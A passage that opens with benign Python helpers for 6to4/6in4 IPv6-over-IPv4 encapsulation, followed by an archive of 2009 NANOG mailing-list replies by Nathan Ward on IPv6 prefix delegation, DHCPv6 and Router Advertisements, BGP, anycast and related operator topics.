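    """6to4: outer IPv4 destination is computed from the inner IPv6 destination.
    Bits 16..47 of a 2002::/16 address hold the peer's IPv4 address; anything
    else goes to a 6to4 relay via the well-known anycast address."""
    dst = ipaddress.ip_address(inner_dst)
    if dst in SIXTO4_PREFIX:
        return ipaddress.ip_address((int(dst) >> 80) & 0xFFFFFFFF)
    return SIXTO4_RELAY_ANYCAST


def sixin4_outer_dst(inner_dst, tunnel_endpoint):
    """6in4: outer IPv4 destination is the configured endpoint, regardless of inner dst."""
    ipaddress.ip_address(inner_dst)  # validated only; it does not influence the result
    return ipaddress.ip_address(tunnel_endpoint)


def ipv4_checksum(header):
    """RFC 791 ones-complement checksum; returns 0 for a header whose field is already correct."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(int.from_bytes(header[i:i + 2], "big") for i in range(0, len(header), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def encapsulate(inner_ipv6_packet, src4, dst4, ttl=64):
    """Wrap an IPv6 packet in a minimal IPv4 header with protocol 41."""
    src = ipaddress.ip_address(src4).packed
    dst = ipaddress.ip_address(dst4).packed
    total_len = 20 + len(inner_ipv6_packet)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, ttl, IPPROTO_IPV6, 0, src, dst)
    header = header[:10] + struct.pack("!H", ipv4_checksum(header)) + header[12:]
    return header + inner_ipv6_packet


if __name__ == "__main__":
    inner = b"\x60" + b"\x00" * 39  # constructed 40-byte IPv6 header placeholder
    for target in ("2002:c000:0204::1", "2001:db8::1"):
        print("6to4 ->", target, "outer dst", sixto4_outer_dst(target))
        print("6in4 ->", target, "outer dst", sixin4_outer_dst(target, "203.0.113.7"))
    print(len(encapsulate(inner, "198.51.100.10", sixto4_outer_dst("2002:c000:0204::1"))), "bytes")
```

The practical consequence for the original poster: a 6in4 tunnel needs a broker or upstream to hand out an endpoint, whereas 6to4 needs nothing but a public IPv4 address and a reachable relay, which is also why 6to4 paths are at the mercy of whichever relay the anycast route lands on.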




Re: Telephones for Noisy Data Centers

2009-06-17 Thread Nathan Ward

On 18/06/2009, at 1:31 PM, Michael J McCafferty wrote:


All,
I'd be OK if we were in a facility that was only average in terms of noise, but we are not. I need an exceptional phone for the data center. Something that doesn't transmit the horrible background noise to the other end, and something that is loud without being painful for the user of this phone. Cordless would be very fine, headset is excellent. Ordinary desk phone is OK... but the most important thing is that it works for clear communication. A loud ringer would be great too... but if the best phone doesn't have one, I'll get an auxiliary ringer.

Does anyone have a phone model that they find to be excellent in a louder than usual data center?



Not 100% what you asked for, but the noise cancelling Jawbone  
bluetooth earpieces are great.


--
Nathan Ward




Re: ICSI Netalyzr launch

2009-06-10 Thread Nathan Ward

On 11/06/2009, at 2:16 PM, v...@ee.lbl.gov wrote:

didn't want to spring for a cert for that eh? www.startssl.com ... hey lookie! free certs!


?  We bought a cert from Thawte specifically so people wouldn't find that it's suspect.  Does it look funny when your browser presents it to you?



I had the same problem, I'm not sure Christopher correctly diagnosed it.

It looks like in Safari, when a Java applet asks for unrestricted access (as opposed to standard) it presents you with the security cert to confirm that you really want it. It says "This certificate is valid", as opposed to "invalid" or "untrusted" or whatever normally comes up.


Screenshot of the GUI:
http://don.braintrust.co.nz/~nward/netalyzr.png

--
Nathan Ward




Re: how many BGP routers, how many ASes

2009-05-13 Thread Nathan Ward

On 14/05/2009, at 5:46 AM, William Herrin wrote:


Figure every AS must have at least one BGP router, the vast majority
will have at least two, many will have more than two, and at least
some will have more than 100. Figure also that there are fewer BGP
routers in use than there are prefixes in the table. Gives you a lower
bound of around 70k and an upper bound around 290k.



How are you certain that there are fewer BGP routers than prefixes?

At all my previous employers we have had more routers than prefixes we  
advertised to the global table (which is where you get your 290k  
number).


--
Nathan Ward




Re: ASPATH Loop

2009-05-10 Thread Nathan Ward

On 10/05/2009, at 10:51 PM, yangyang. wang wrote:


As we know, BGP instance running on routers don't allow loop in
ASPATH, why they can be seen in RIBs? It's some particular technical
configuration in practice? OR What's wrong with AS3130??



Look at the WHOIS entry for AS3130, and notice in the comments field:
http://psg.com/as3130/

"Regarding strange announcements by AS 3130 of prefixes in 98.128.0.0/16" is in the big headings on the top of that page.


He is no doubt announcing it with an origin AS of 3130 so no person or  
router complains about inconsistent origins.


--
Nathan Ward




Re: Where to buy Internet IP addresses

2009-05-04 Thread Nathan Ward


On 4/05/2009, at 7:19 PM, Mikael Abrahamsson wrote:


On Mon, 4 May 2009, Florian Weimer wrote:

By definition, every single one of them that buys wireless router, then buys another and hangs it off the first. That happens more often than you would think.


Isn't the traffic bridged, so that you don't have to route WINS and other stuff?  Then it's still a single subnet.


Most people don't have the skill to do this, so they just hang the  
second NAT box behind the first and it works.


So the lesson from this is that any home IPv6 gateway needs to be  
able to both receive (from ISP) and provide PD (towards other home  
devices), as this is something people will want to do (because they  
do it today).



I think that they have to be forwarded. What do you do if people chain  
three routers? How does your actual CPE know to dish out a /60 and not  
a /64 or something? What if someone chains four? What if someone puts  
three devices behind the second?


These are weird topologies, sure, but coming up with some algorithm to  
handle some of them and not others is going to be too complicated, and  
leave some people without a workable solution.


Forwarding these requests up to the ISP's router and having several  
PDs per end customer is in my opinion the best way to go.


--
Nathan Ward




Re: Where to buy Internet IP addresses

2009-05-04 Thread Nathan Ward

On 4/05/2009, at 8:31 PM, Mikael Abrahamsson wrote:


On Mon, 4 May 2009, Nathan Ward wrote:

I think that they have to be forwarded. What do you do if people chain three routers? How does your actual CPE know to dish out a /60 and not a /64 or something? What if someone chains four? What if someone puts three devices behind the second?


This is a CPE problem, the main homegateway can decide to dish out /64s to all other home routers, this means they can have a bunch. It also means they can't chain 3 in serial, unless the home user decides to hand out /60s to each and only have 3 of them connected to the main CPE.


That is one way to do it, sure. However it makes things hard for end  
users, having to figure out how all this stuff fits together. My non  
technical friends have a enough time with 3.5mm jack to RCA audio  
cables, but they managed to get a wireless router and plug it in and  
have it magically work for them.


Forwarding these requests up to the ISP's router and having several  
PDs per end customer is in my opinion the best way to go.


Why is this better? Why do you want to waste your tcam entries like  
that? A single /56 per customer makes you have the fewest amount of  
tcam entries in any solution I can imagine. All other solutions  
require more.



Because it allows the home user to arrange their network however they  
want, up to 16 subnets, without having to have any knowledge of how  
things actually work.


I'm sure we can both think of a few ways to make this not cost a whole  
lot of TCAM entries, either with protocol support, or in internal  
implementation specific ways.

I can immediately think of two ways that cost no extra TCAM entries.

--
Nathan Ward




Re: Where to buy Internet IP addresses

2009-05-03 Thread Nathan Ward


On 3/05/2009, at 7:53 PM, Matthew Moyle-Croft wrote:


James Hess wrote:


A  /62  takes care of that unusual case, no real need for a /56 for the average residential user; that's just excessive.  Before wondering about the capabilities of home routers.. one might wonder if there will even be _home_   routers ?


I think you'd want to do a /60 so it's on a nibble boundary.  But  
by then you might as well do a /56.


My personal feeling is that 99% of  home networks will use a single /64, but we'll be giving out /60s and /56s to placate the 1% who are going to jump up and down and shout at us about it because of some reason that they feel makes it all unfair or that we're thinking like ipv4 not ipv6 etc.


17% of packets leaving an ISP here in NZ were from behind double NAT.  
(or, they went through 2 routing hops in the home, which I suspect is  
fairly rare)


Why does this happen? $customer has an ADSL router with no wireless,  
then they go buy a wireless router and plug the ADSL router in to  
the internet port.


I suspect your market is not that different to NZ.

It's possible that home networks will gain some ability (in a  
standard fashion) to use more than one /64, but I doubt it - it's  
much easier to do resource discovery on a single broadcast domain  
for things like printers, file sharing etc.


The above mentioned sort of stuff will keep happening, I'm sure, and  
because the ADSL router and the wireless router are the only devices  
on the same subnet, no service discovery things need to happen.



I have an idea brewing to allow routers to forward PD requests. The  
idea would be that a BRAS/LNS only assigns a /64 for each PD request,  
and the customer router forwards PD requests for routers attached to  
their inside interface. That way, we can chain up to 16 subnets in the  
home. The BRAS can reserve a /60 or /56 or whatever for each customer  
so they are contiguous, or whatever.


--
Nathan Ward




Re: one shot remote root for linux?

2009-04-29 Thread Nathan Ward


On 29/04/2009, at 3:25 PM, Nathan Ward wrote:


On 29/04/2009, at 3:10 PM, Crooks, Sam wrote:

Cisco ASA's appear to be linux under the hood based on watching versions of ASA804-3/12/19/23/31 boot on the console



They are Linux, and run two copies of IOS simultaneously in a VM each.



Erk, sorry, I brain farted and was thinking of the ASR. I'm really not  
sure about the ASA product line.


--
Nathan Ward




Re: Study of IPv6 Deployment

2009-04-28 Thread Nathan Ward


On 29/04/2009, at 5:30 AM, Harald Firing Karlsen wrote:

Please check out the following link with some information/statistics from a LAN-party taking place in Norway (yeah, Norway is in Europe, not North America, but it still gives an overview):

http://technet.gathering.org/?p=121

There were over 5000 computers in the arena and of those 47% had a valid and working IPv6 address. They were also provided with IPv4 and no NAT at all. The only ports being closed outbound was 25, 135-139 and 445. Google over IPv6 was enabled for the event as well, so a lot of the traffic was towards google.



Did you have any problems that you encountered? Poorly behaving IPv6  
stacks, rogue RA+SLAAC/DHCPv6, etc.?


Do you have any netflow logs from the event?

--
Nathan Ward




Re: one shot remote root for linux?

2009-04-28 Thread Nathan Ward

On 29/04/2009, at 3:10 PM, Crooks, Sam wrote:

Cisco ASA's appear to be linux under the hood based on watching versions of ASA804-3/12/19/23/31 boot on the console



They are Linux, and run two copies of IOS simultaneously in a VM each.

Kind of like how VMWare ESX is Linux - technically it is, but you  
don't really treat it as such.


--
Nathan Ward




Re: Problems reaching tools.ietf.org?

2009-04-24 Thread Nathan Ward

On 25/04/2009, at 12:45 AM, Jack Bates wrote:

Anyone seeing issues with reachability for tools.ietf.org in IPv6? v4 works fine for me, but oh, the timeouts. :(

Tracing the route to tools.ietf.org (2001:1890:1112:1:214:22FF:FE1F:1E54)

 1 bnet6-2.tunnel.tserv2.fmt.ipv6.he.net (2001:470:1F03:1031::1) 64 msec 64 msec 64 msec
 2 1g-3-9.core1.fmt1.ipv6.he.net (2001:470:0:44::3) 76 msec 72 msec 76 msec
 3 10gigabitethernet1-1.core1.pao1.he.net (2001:470:0:2E::2) 64 msec 64 msec 64 msec
 4 10gigabitethernet2-4.core1.ash1.he.net (2001:470:0:35::2) 144 msec 140 msec 140 msec
 5 ibr01-ve96.asbn01.occaid.net (2001:504:0:2:0:3:71:1) 140 msec 140 msec 140 msec
 6 r1.flpnj.ipv6.att.net (2001:4830:E2:2B::2) 148 msec 148 msec 148 msec
 7 2001:1890:61:9117::2 224 msec 228 msec 224 msec
 8 2001:1890:61:9117::2 !H  *  *



I'm betting you are on 6to4.

6to4 has never worked for me, reaching tools.ietf.org.

--
Nathan Ward




Re: NAT64/NAT-PT update in IETF, was: Re: Important New Requirement for IPv4 Requests [re impacting revenue]

2009-04-23 Thread Nathan Ward

On 24/04/2009, at 12:14 AM, Pekka Savola wrote:

On Thu, 23 Apr 2009, Nathan Ward wrote:
After trying to participate on mailing lists for about 2 or 3  
years, it's pretty hard to get anything done without going to  
meetings.


Just participating in mailing lists is good for keeping up to date,  
but not so good for getting things changed.


That's what I've found, anyway. Might not always be true.


If you were to go to meetings, you would realize that it won't help in getting things changed significantly better than active mailing list participation would... :-/


I got heaps done in SFO - to the point where I'm happy to pay to get  
to Stockholm and Hiroshima later this year (I'm self employed, and  
live at the end of the world, so for me it's harder than most who just  
have to convince the boss :-).


--
Nathan Ward




Re: Broadband Subscriber Management

2009-04-23 Thread Nathan Ward

On 24/04/2009, at 12:23 AM, William McCall wrote:

My understanding of the PPPoA/E deal is that SPs (originally) wanted to prevent some yahoo with a DSL modem from just being able to hook in to someone's existing DSL connection and using it, so they decided to implement PPPoA and require some sort of authentication to prevent this scenario.


Also, DSL was the upgrade from dialup in many places, and dialup is  
generally PPP.


For ISPs, the re-engineering required north of the last mile is much  
less, particularly in the billing/accounting systems that no one wants  
to touch because they were written by that coder who left a few years  
ago and work just fine.


--
Nathan Ward




Re: IPv4 Anycast?

2009-04-22 Thread Nathan Ward

On 22/04/2009, at 6:53 PM, Zhenkai Zhu wrote:


Hello NANOG,

I noticed that more than 3K prefixes are  with  2  Origin  ASes.
Are they the simplest cases of anycast? Or they are mainly due to  
misconfiguration?



The third (and probably more likely) option is that the prefixes are  
advertised by two providers as the customer wants redundancy with  
their own IP space, but does not have a public ASN. Ie. the customer  
has a circuit and possibly a BGP feed to two different providers.


--
Nathan Ward




Re: IPv4 Anycast?

2009-04-22 Thread Nathan Ward

On 22/04/2009, at 7:12 PM, Zhenkai Zhu wrote:

Ah, that's very possible. So I suppose the 90 prefixes with 3 origin  
ASes are due to the same reason..


Then there is basically no inter-As anycast besides the anycast  
prefix for DNS root, since I only noticed like 8 prefixes that are  
announced by more than 3 ASes..



I never said that was the only reason, I'm sure plenty of people are  
doing anycast with different originating ASes.


For example, check the 192.88.99.0/24 prefix.

--
Nathan Ward




Re: NAT64/NAT-PT update in IETF, was: Re: Important New Requirement for IPv4 Requests [re impacting revenue]

2009-04-22 Thread Nathan Ward

On 23/04/2009, at 8:12 AM, Jack Bates wrote:


Iljitsch van Beijnum wrote:
In v6ops CPE requirements are being discussed so in the future, it  
should be possible to buy a $50 home router and hook it up to your  
broadband service or get a cable/DSL modem from your provider and  
the IPv6 will be routed without requiring backflips from the user.
So there is a fair chance that we'll be in good shape for IPv6  
deployment before we've used up the remaining 893 million IPv4  
addresses.


I think this annoys people more than anything. We're how many years  
into the development and deployment cycle of IPv6? What development  
cycle is expected out of these CPE devices after a spec is FINALLY  
published?


If the IETF is talking future and developers are also talking  
future, us little guys that design, build, and maintain the  
networks can't really do much. I so hope that vendors get sick of it  
and just make up their own proprietary methods of doing things. Let  
the IETF catch up later on.



This work is actually mostly being done by some guys at Cisco, and  
other vendors have plenty of input as well.


I would be surprised if CPEs that support the outcome of this work are  
far behind the RFC being published (or even a late draft).


--
Nathan Ward




Re: Important New Requirement for IPv4 Requests

2009-04-22 Thread Nathan Ward

On 23/04/2009, at 3:33 AM, Joe Abley wrote:

However, I take some small issue with the assertion that FTP is  
easier to script than HTTP. The only way I have ever found it easy  
to script FTP (outside of writing dedicated expect scripts to drive  
clients, which really seems like cheating) is to use tools like  
curl, and I don't see why HTTP is more difficult than FTP as a  
protocol in that case. Perhaps I'm missing something.



It looks like curl can upload stuff (-d @file) but you have to have  
something on the server to accept it. FTP sounds easier.


--
Nathan Ward




Re: Malicious code just found on web server

2009-04-21 Thread Nathan Ward

On 21/04/2009, at 5:23 AM, Mike Lewinski wrote:


Paul Ferguson wrote:


Most likely SQL injection. At any given time, there are hundreds of
thousands of legitimate websites out there that are unwittingly  
harboring

malicious code.


Most of the MS-SQL injection attacks we see write malicious  
javascript into the DB itself so all query results include it.  
However, I'm not sure how easy it is to leverage to get system  
access - we've seen a number of compromised customer machines and  
there didn't appear to be any further compromise of them beyond the  
obvious. In the OP's case it sounds like static HTML files were  
altered. My bet is that an ftp or ssh account was brute forced.



I have seen a couple of open source web apps (CMSs, etc.) that store  
names of php files in a database, and those file names are then  
opened with fopen. SQL injection could be used to write a URL into  
the database, and then wait for that entry to be called, and voilà,  
you can execute php code, or whatever.


Obviously that is relevant to the first part of your reply - it would  
not work with static content.


--
Nathan Ward
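The pattern described above (a CMS that keeps the name of the file to load in a database row, and an SQL injection that swaps that row for a URL), as an added example that is not part of the original post. It is a toy in Python with an in-memory SQLite database rather than PHP/MySQL; the schema, the `/var/www/cms/templates` path and the `attacker.example` host are constructed for illustration. `resolve_vulnerable` stands in for opening the raw database value with URL wrappers enabled, `resolve_hardened` for the check that treats the database as untrusted input rather than a trust boundary.

```python
import re
import sqlite3

TEMPLATE_ROOT = "/var/www/cms/templates"   # hypothetical install path
SAFE_TEMPLATE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.php$")

# Constructed payload: closes the INSERT's string, appends an UPDATE that
# replaces the stored template name with a remote URL, then comments out
# the rest of the original statement.
INJECTED_COMMENT = (
    "nice post'); "
    "UPDATE pages SET template='http://attacker.example/shell.txt'; --"
)


def build_db():
    """In-memory CMS schema with one page whose template is a local file."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (slug TEXT PRIMARY KEY, template TEXT)")
    conn.execute("CREATE TABLE comments (body TEXT)")
    conn.execute("INSERT INTO pages VALUES ('home', 'home.php')")
    conn.commit()
    return conn


def add_comment_vulnerable(conn, body):
    """String-built SQL; executescript lets the stacked UPDATE run too."""
    conn.executescript(f"INSERT INTO comments (body) VALUES ('{body}')")


def add_comment_hardened(conn, body):
    """Parameterised query: the payload is stored as data, nothing else runs."""
    conn.execute("INSERT INTO comments (body) VALUES (?)", (body,))
    conn.commit()


def stored_template(conn, slug):
    """What the page-render path reads back from the database."""
    row = conn.execute(
        "SELECT template FROM pages WHERE slug = ?", (slug,)
    ).fetchone()
    return row[0] if row else None


def resolve_vulnerable(name):
    """Models fopen()/include of the raw row with URL wrappers enabled:
    whatever the row says is what gets opened, local path or remote URL."""
    return name


def resolve_hardened(name):
    """Treat the row as untrusted: allowlist the bare file name, then anchor
    it under TEMPLATE_ROOT so neither a URL nor ../ can escape the directory."""
    if not isinstance(name, str) or not SAFE_TEMPLATE.match(name):
        raise ValueError(f"refusing to load template {name!r}")
    return f"{TEMPLATE_ROOT}/{name}"


def render_home(conn, resolver):
    """Return the path (or URL) the CMS would open for the 'home' page."""
    return resolver(stored_template(conn, "home"))


if __name__ == "__main__":
    db = build_db()
    add_comment_vulnerable(db, INJECTED_COMMENT)
    print("row after injection:", stored_template(db, "home"))
    print("vulnerable include opens:", render_home(db, resolve_vulnerable))
    try:
        render_home(db, resolve_hardened)
    except ValueError as exc:
        print("hardened include:", exc)
```

Two things are worth keeping separate: the parameterised INSERT stops the row from being changed through this input, and the allowlist in `resolve_hardened` stops a changed row (via any other injection point, or an admin with a weak password) from turning into remote code execution. Both belong in the fix.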




Re: ADMIN: Reminder on off-topic threads

2009-04-21 Thread Nathan Ward

On 22/04/2009, at 3:57 PM, Joe Greco wrote:


It may not be wise to wait until ARIN allocates 256.0.0.0/8 to someone
and everyone chimes in to note that their routers are barfing on that.
:-/



Now that *would* be amusing.

--
Nathan Ward




Re: IXP

2009-04-17 Thread Nathan Ward


On 18/04/2009, at 12:08 PM, Paul Vixie wrote:
i should answer something said earlier: yes there's only 14 bits of tag and
yes 2**14 is 4096.  in the sparsest and most wasteful allocation scheme,
tags would be assigned 7:7 so there'd be a max of 64 peers.  it's more
likely that tags would be assigned by increment, but it's still nowhere
near enough for 300+ peers.  however, well before 300 peers, there'd be
enough staff and enough money to use something other than a switch in the
middle, so that the tagspace would be per-port rather than global to the
IXP.  Q in Q is not how i'd build this... cisco and juniper both have
hardware tunnelling capabilities that support this stuff...  it just means
as the IXP fabric grows it has to become router-based.



On Alcatel-Lucent 7x50 gear, VLAN IDs are only relevant to that local  
port. If you want to build a VLAN that operates like it does on a  
Cisco switch or something, you set up a tag on each port, and join the  
tags together with a L2 switching service. The tag IDs can be  
different on each port, or the same... it has no impact.


--
Nathan Ward




Re: Fiber cut in SF area

2009-04-13 Thread Nathan Ward

On 14/04/2009, at 11:35 AM, David Barak wrote:

In addition, as has been noted, this system wouldn't PREVENT a  
failure, it would just give you some warning that a failure may be  
coming, probably by a matter of minutes.



Some statistics about the effectiveness of car alarms and unmonitored  
house alarms would probably be useful here.


Whack a $5 12v horn on it, and my bet is that it'd become a deterrent  
pretty quickly.


--
Nathan Ward




Re: Verizon EVDO Issues

2009-04-08 Thread Nathan Ward

On 8/04/2009, at 10:27 PM, Alexander Harrowell wrote:
Do they maintain a continuous data link in normal operation (like, say,
connectivity for a LAN, or backhaul for a camera or some such), or do they
request the data link when they need to send [whatever] (like a discrete SCADA
system)? My (user only) experience is that cellular data service doesn't
handle long sessions well.



I've had great success with it. We have done live audio streaming over  
IP through a cellular service before. 64kbps ogg encoding.


About 7 or so hours in one session.

We used to do a cheap live broadcast from an outdoor event for a radio  
station.


--
Nathan Ward




Re: ACLs vs. full firewalls

2009-04-07 Thread Nathan Ward

On 8/04/2009, at 10:32 AM, Karl Auer wrote:

I'd be interested to hear why people use firewalls. I've never felt  
the

need, myself - am I living in a fool's paradise?



End hosts are not always trustworthy.

If a host is compromised, should it be able to send anything and  
everything out to the public network?
If a host is a desktop PC controlled by an end user, should it be able  
to send and receive anything it wants?


IMO, host based filtering and ACLs (either firewalls or router ACLs or  
whatever) in the network should both be used. They fulfil different  
needs.


--
Nathan Ward




Re: Google Over IPV6

2009-03-27 Thread Nathan Ward

On 27/03/2009, at 11:20 AM, Florian Weimer wrote:


Google seems to aim at Tier 1 status for IPv6.  No transit, no
tunneling.



That seems to be the case, yep. It's an interesting plan.

On 27/03/2009, at 8:03 AM, Robert D. Scott wrote:


Their press would indicate that more than www is IPV6.


Yep. Map tiles over IPv6 was turned on last week during the Google  
IPv6 Implementers meeting, and other stuff is IPv6 as well. The  
traffic jump was pretty big :-)


[nw...@dhcp-12df.meeting.ietf.org]~% host -t  www.gmail.com | grep  
IPv6

googlemail.l.google.com has IPv6 address 2001:4860:b003::53
[nw...@dhcp-12df.meeting.ietf.org]~% host -t  maps.google.com |  
grep IPv6

maps.l.google.com has IPv6 address 2001:4860:b003::68
[nw...@dhcp-12df.meeting.ietf.org]~% host mt0.google.com | grep IPv6
mt.l.google.com has IPv6 address 2001:4860:b003::88
mt.l.google.com has IPv6 address 2001:4860:b003::be
mt.l.google.com has IPv6 address 2001:4860:b003::5b
mt.l.google.com has IPv6 address 2001:4860:b003::5d

etc. etc.

(mt[0-3].google.com are the same)

--
Nathan Ward




Re: switch speed question

2009-02-25 Thread Nathan Ward

On 26/02/2009, at 2:48 AM, David Barak wrote:

Doesn't that assume that the communication is unidirectional?


...

No.

If two hosts are exchanging 1Gbps flows, the traffic across the bus  
will be 2Gbps, right?


Yes. 1Gbps backplane impact per host. You have two hosts, right? One  
host per port? That's 1Gbps per port.

So, 24 ports = 24Gbps, right?

Let's try look at it another way:
- A 24 port gig switch can receive at most 24Gbps.
- That same switch can transmit at most 24Gbps.

You don't get to add transmit and receive together to get 48Gbps.  
Packets don't go across the backplane once to receive, and then once  
more to transmit. They go across once, from the receiving port to the  
transmitting port. (sure, sometimes perhaps packets do go across  
twice, but not normally)


And of course, this doesn't include any bus-intensive operations like  
multicast or things which require cpu processing - those can consume a  
lot more resources than the input rate of the port.


Of course multicast/broadcast consumes more resources than the input  
rate. That's the point. If you receive multicast or broadcast at  
1Gbps, and the multicast needs to go out all the ports, you need to  
transmit at 24Gbps. That's 24 x the transmit resources (and probably  
backplane resources, depending on architecture etc. etc.) than a  
single 1Gbps unicast stream.


Of course, with unicast it is only getting to one host.

Let's assume we have data at 1Gbps that we need to get to 24 hosts.
- If we unicast, we need 24 input ports, and 24 output ports, assuming  
we only have gig ports (or say 3x10GE, or whatever).

- If we multicast, we need 1 input port, and 24 output ports.

When you compare the end result, multicast uses significantly less  
resources, right?


In fact, perhaps some bus architectures know about how multicast  
works, and it consumes *less* resources than doing the same thing with  
many unicast streams. If the bus does not know about multicast, then  
the bus would treat it as 24 unicast streams, surely.


--
Nathan Ward




Re: IPv6 Confusion

2009-02-18 Thread Nathan Ward


On 19/02/2009, at 9:08 AM, Chuck Anderson wrote:


On Wed, Feb 18, 2009 at 12:55:19PM -0700, Aria Stewart wrote:


On 18/02/2009 19:39, Kevin Loch wrote:

Just how DO we get the message to the IETF that we need all the
tools we
have in v4 (DHCP, VRRP, etc) to work with RA turned off?


What operational reasons are there for working with RA turned off?


I don't want any system to be able to get IPv6 addressing information
until the system has been identified in our central management system.
I also want the IPv6 address assignment to be made centrally.



You must have missed my post asking people to be clear in their  
distinction between RA and SLAAC.


I will re-cap:
- RA does NOT give your host IPv6 addressing information.
- SLAAC gives your host IPv6 addressing information. SLAAC data is  
carried in RA messages, as an OPTION.

- Another RA OPTION is use DHCPv6 to get addressing information.

DHCPv6 can operate without RA now. You can send DHCPv6 requests to  
your local LAN before you get an RA message telling you to do so. This  
requires you to manually configure your host to do that. That sounds  
like a waste of time, when you can use RA messages to tell your hosts  
to use DHCPv6 to get addressing information. Of course, DHCPv6 does  
not currently have an option for default router, so you need RA for  
that. Again, RA is not giving out addressing information, only  
"Hi, I am a router."



I suspect this removes the desire for getting VRRP without RA as  
well for those of you wanting to use DHCPv6 for addressing - RA is not  
giving out addressing information, and is only giving out "Use DHCPv6"  
bits and a router address.


--
Nathan Ward




Re: IPv6 Confusion

2009-02-18 Thread Nathan Ward

On 19/02/2009, at 9:17 AM, valdis.kletni...@vt.edu wrote:

2) Some end-node box with an IPv6 stack from Joe's Software Emporium and
Bait-n-Tackle sees an RA packet, and concludes that since RA and DHCPv6
are mutually exclusive, to ignore any DHCPv6 packets it sees, and hilarity
ensues.



They are not mutually exclusive, DHCPv6 *requires* RA.

Or did you mean SLAAC?

If you did, I am not sure that they are mutually exclusive - I see no  
reason for telling hosts a prefix to number out of (SLAAC), and also  
telling hosts to use DHCPv6. That actually seems like a good solution  
to a number of problems.


--
Nathan Ward
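The distinction drawn in the two replies above (RA carries SLAAC prefixes only as an option, the M flag points a host at DHCPv6 for addresses, and a single RA can carry both at once), as an added example that is not part of the original posts. It builds and decodes Router Advertisement payloads laid out per RFC 4861; the checksum is left zero and the `2001:db8::/32` prefixes are documentation space, so the messages are sample data rather than captures.

```python
import ipaddress
import struct

ICMPV6_ROUTER_ADVERTISEMENT = 134
OPT_PREFIX_INFORMATION = 3
RA_FLAG_MANAGED = 0x80       # M: get addresses from DHCPv6
RA_FLAG_OTHER = 0x40         # O: get other configuration from DHCPv6
PIO_FLAG_ONLINK = 0x80       # L: prefix is on-link
PIO_FLAG_AUTONOMOUS = 0x40   # A: host may form an address from this prefix (SLAAC)


def build_ra(managed, other, router_lifetime, prefixes):
    """Construct an RA ICMPv6 payload (checksum left zero; sample data only).
    `prefixes` is a list of (prefix, autonomous) pairs."""
    flags = (RA_FLAG_MANAGED if managed else 0) | (RA_FLAG_OTHER if other else 0)
    # type, code, checksum, cur hop limit, flags, router lifetime,
    # reachable time, retrans timer
    msg = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERTISEMENT, 0, 0, 64,
                      flags, router_lifetime, 0, 0)
    for prefix, autonomous in prefixes:
        net = ipaddress.IPv6Network(prefix)
        pio_flags = PIO_FLAG_ONLINK | (PIO_FLAG_AUTONOMOUS if autonomous else 0)
        # Prefix Information option: type 3, length 4 (32 bytes):
        # prefix length, flags, valid lifetime, preferred lifetime, reserved, prefix
        msg += struct.pack("!BBBBIII", OPT_PREFIX_INFORMATION, 4, net.prefixlen,
                           pio_flags, 2592000, 604800, 0)
        msg += net.network_address.packed
    return msg


def summarise_ra(payload):
    """Decode what an RA actually tells a host: the SLAAC prefixes (Prefix
    Information options with A set), the M/O flags that point at DHCPv6,
    and whether the sender offers itself as a default router."""
    if len(payload) < 16 or payload[0] != ICMPV6_ROUTER_ADVERTISEMENT:
        raise ValueError("not a Router Advertisement")
    (_type, _code, _csum, _hlim, flags,
     router_lifetime, _reach, _retrans) = struct.unpack("!BBHBBHII", payload[:16])
    slaac_prefixes = []
    offset = 16
    while offset + 2 <= len(payload):
        opt_type, opt_len = payload[offset], payload[offset + 1]
        if opt_len == 0:
            raise ValueError("zero-length option")   # RFC 4861: discard the packet
        end = offset + opt_len * 8
        if end > len(payload):
            raise ValueError("truncated option")
        if opt_type == OPT_PREFIX_INFORMATION and opt_len == 4:
            plen, pio_flags = payload[offset + 2], payload[offset + 3]
            prefix = ipaddress.IPv6Address(payload[offset + 16:offset + 32])
            if pio_flags & PIO_FLAG_AUTONOMOUS:
                slaac_prefixes.append(f"{prefix}/{plen}")
        offset = end
    return {
        "default_router": router_lifetime > 0,
        "dhcpv6_addresses": bool(flags & RA_FLAG_MANAGED),
        "dhcpv6_other": bool(flags & RA_FLAG_OTHER),
        "slaac_prefixes": slaac_prefixes,
    }


if __name__ == "__main__":
    print("SLAAC only :", summarise_ra(build_ra(False, False, 1800, [("2001:db8:1::/64", True)])))
    print("DHCPv6 only:", summarise_ra(build_ra(True, True, 1800, [("2001:db8:1::/64", False)])))
    print("both       :", summarise_ra(build_ra(True, False, 1800, [("2001:db8:2::/64", True)])))
```

The "DHCPv6 only" case is the one the thread keeps circling: the RA still carries a prefix (with A clear, so the host will not number itself from it) and a non-zero router lifetime, so the host learns its default router from RA and its address from DHCPv6. A router lifetime of zero with M set is the opposite corner: addresses via DHCPv6, but no default route from this sender.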




Re: IPv6 Confusion

2009-02-18 Thread Nathan Ward

On 19/02/2009, at 9:15 AM, Randy Bush wrote:


What operational reasons are there for working with RA turned off?


networks with visitors have shown a serious problem with rogue RAs



Networks with visitors have shown a serious problem with rogue DHCP  
servers.
Networks with visitors that use DHCPv6 for address assignment will  
have the exact same problem if someone comes along with a rogue DHCPv6  
server.


You need to push your vendors for features to limit where RA messages  
and DHCPv6 messages can be sent from. Coming up with new ways to solve  
a problem with an already obvious solution (a solution that we have  
for an identical problem in IPv4) sounds like it would take longer to  
solve, and sounds like it would introduce even more confusion into  
this space.


If your ethernet equipment has the ability to filter on ethernet  
source/destination then you should be able to do this a little bit now.
- Only allow messages to the all routers multicast address to go to  
the switch interfaces that have routers on them.
- Only allow messages to the all DHCPv6 servers multicast address to  
go to the switch interfaces that have DHCPv6 servers or relays on them.


If your ethernet equipment can do IPv6 L4 ACLs then that is even  
better, you can allow RA messages only from routers, and DHCPv6  
responses only from DHCPv6 servers.


Again, this is the same problem we have with DHCP in IPv4. The only  
difference is switch vendor support for filtering these messages.


--
Nathan Ward




Re: IPv6 Confusion

2009-02-18 Thread Nathan Ward

On 19/02/2009, at 9:34 AM, Leo Bicknell wrote:

Allowing an UNAUTHENTICATED BROADCAST packet to determine where you send
your traffic is insane.  Rather than moving forward, this is a
gigantic step backwards for security and reliability.


I guess you don't use DHCP in IPv4 then.

It seems there are lots of people who want auto configuration in IPv6  
